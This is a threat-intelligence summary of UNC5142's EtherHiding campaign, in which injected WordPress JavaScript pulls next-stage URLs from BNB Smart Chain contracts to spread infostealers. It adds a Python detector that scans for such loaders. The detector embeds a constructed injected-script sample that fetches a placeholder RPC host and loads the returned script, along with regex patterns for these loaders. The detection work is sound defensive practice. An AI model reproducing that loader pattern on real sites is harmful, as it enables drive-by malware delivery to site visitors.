CyberHappenings

UNC5142 Abuses Blockchain Smart Contracts to Spread Malware via Compromised WordPress Sites

1 unique source, 1 article

Summary


A financially motivated threat actor tracked as UNC5142 has been abusing blockchain smart contracts to distribute information stealers, including Atomic, Lumma, Rhadamanthys, and Vidar, to Windows and macOS systems. The attacks start from compromised WordPress websites and use a technique called 'EtherHiding', in which parts of the attack chain are stored on a public blockchain, where they are hard to take down. The campaign uses a multi-stage JavaScript downloader named CLEARSHORT: the first stage, injected into the compromised site, queries a malicious smart contract on the BNB Smart Chain, and the data the contract returns points to a landing page hosted on an external server. That landing page relies on social engineering to get the victim to run the malware. Google Threat Intelligence Group (GTIG) flagged about 14,000 web pages containing injected JavaScript associated with UNC5142, indicating broad targeting of vulnerable WordPress sites. No activity has been observed since July 23, 2025.
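The EtherHiding step described above, as an added example that is not part of the original article or of any GTIG tooling: a small Python script that (a) scans a JavaScript source for the hallmarks of a blockchain-backed loader (a BNB Smart Chain RPC endpoint, an eth_call JSON-RPC request, a hard-coded 20-byte contract address, and dynamic script injection) and (b) decodes the ABI-encoded string an eth_call returns, which is how such a loader turns a contract's stored value into the next-stage URL. The heuristic is general to EtherHiding-style loaders rather than specific to CLEARSHORT, and the injected-script sample, RPC host, contract address, function selector and decoded URL are all constructed placeholders, not indicators from the campaign.

```python
import re
from dataclasses import dataclass

# Constructed sample of an injected first-stage script, modelled on the
# EtherHiding pattern: the page asks a BNB Smart Chain JSON-RPC endpoint
# (eth_call) for a contract's stored value and treats the decoded result as
# the next-stage URL. The host, contract address and selector are
# placeholders, not indicators from the UNC5142 campaign.
SAMPLE_INJECTED_JS = r"""
(async()=>{const r=await fetch("https://bsc-rpc.example.invalid/",{method:"POST",
headers:{"content-type":"application/json"},body:JSON.stringify({jsonrpc:"2.0",id:1,
method:"eth_call",params:[{to:"0x1111111111111111111111111111111111111111",
data:"0x20965255"},"latest"]})});const j=await r.json();
const u=abiDecodeString(j.result);const s=document.createElement("script");
s.src=u;document.head.appendChild(s);})();
"""

# Constructed benign script for comparison.
BENIGN_JS = 'document.addEventListener("DOMContentLoaded",()=>console.log("ready"));'

RPC_ENDPOINT_RE = re.compile(r'https?://[^"\'\s]*(?:bsc|binance|bnb)[^"\'\s]*', re.I)
ETH_CALL_RE = re.compile(r'["\']?method["\']?\s*:\s*["\']eth_call["\']')
# A 20-byte address: 0x followed by exactly 40 hex digits, not part of a longer hex blob.
CONTRACT_ADDR_RE = re.compile(r'(?<![0-9a-fA-Fx])0x[0-9a-fA-F]{40}(?![0-9a-fA-F])')
DYNAMIC_SCRIPT_RE = re.compile(r'createElement\(\s*["\']script["\']\s*\)')


@dataclass
class Finding:
    rpc_endpoints: list
    contract_addresses: list
    uses_eth_call: bool
    loads_remote_script: bool

    @property
    def suspicious(self) -> bool:
        # A read-only contract call plus a hard-coded contract address is the
        # core of the EtherHiding loader; the other two signals raise
        # confidence but are not required.
        return self.uses_eth_call and bool(self.contract_addresses)


def scan_js(source: str) -> Finding:
    """Flag the hallmarks of a blockchain-backed loader in one JS source."""
    return Finding(
        rpc_endpoints=[m.group(0) for m in RPC_ENDPOINT_RE.finditer(source)],
        contract_addresses=sorted(set(CONTRACT_ADDR_RE.findall(source))),
        uses_eth_call=bool(ETH_CALL_RE.search(source)),
        loads_remote_script=bool(DYNAMIC_SCRIPT_RE.search(source)),
    )


def abi_encode_string(s: str) -> str:
    """Encode a Solidity `string` return value: offset word, length word, padded data."""
    raw = s.encode("utf-8")
    pad = (-len(raw)) % 32
    return (
        "0x"
        + (32).to_bytes(32, "big").hex()
        + len(raw).to_bytes(32, "big").hex()
        + raw.hex()
        + "00" * pad
    )


def abi_decode_string(result_hex: str) -> str:
    """Decode the `result` of an eth_call whose function returns a single `string`."""
    data = bytes.fromhex(result_hex[2:] if result_hex.startswith("0x") else result_hex)
    if len(data) < 64:
        raise ValueError("too short for an ABI-encoded string")
    offset = int.from_bytes(data[:32], "big")
    if offset + 32 > len(data):
        raise ValueError("offset word points past end of data")
    length = int.from_bytes(data[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(data):
        raise ValueError("length word runs past end of data")
    return data[start:start + length].decode("utf-8", errors="replace")


if __name__ == "__main__":
    for name, src in (("injected", SAMPLE_INJECTED_JS), ("benign", BENIGN_JS)):
        f = scan_js(src)
        print(f"{name}: suspicious={f.suspicious} {f}")
    # A constructed eth_call result carrying a placeholder next-stage URL.
    fake_result = abi_encode_string("https://landing.example.invalid/page")
    print("decoded next-stage URL:", abi_decode_string(fake_result))
```

To use this on a real site, run scan_js over every .js file under wp-content and over inline script blocks in cached pages; a hit on the eth_call plus contract-address combination is worth a manual look even when the RPC host is one the scanner does not recognise, since the contract address, not the RPC provider, is what ties the loader to the campaign infrastructure. The decoder deliberately bounds-checks the offset and length words, because an attacker-controlled contract can return malformed data.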

Timeline

  1. 16.10.2025 17:52 · 1 article

    UNC5142 Campaign Evolves with Blockchain Smart Contracts

    UNC5142 has been observed using compromised WordPress sites and blockchain smart contracts to distribute information stealers. The campaign employs a multi-stage JavaScript downloader named CLEARSHORT, whose first stage interacts with malicious smart contracts on the BNB Smart Chain. The attacks target both Windows and macOS systems and rely on social engineering to get victims to infect themselves. The campaign has evolved from a single contract to a more sophisticated three-contract system, which lets the actor update the chain quickly and makes it more resilient to takedown. The threat actor runs two distinct sets of smart contract infrastructure: the Main infrastructure serves as the core of the campaign, while the Secondary infrastructure supports specific surges in activity or the testing of new lures.

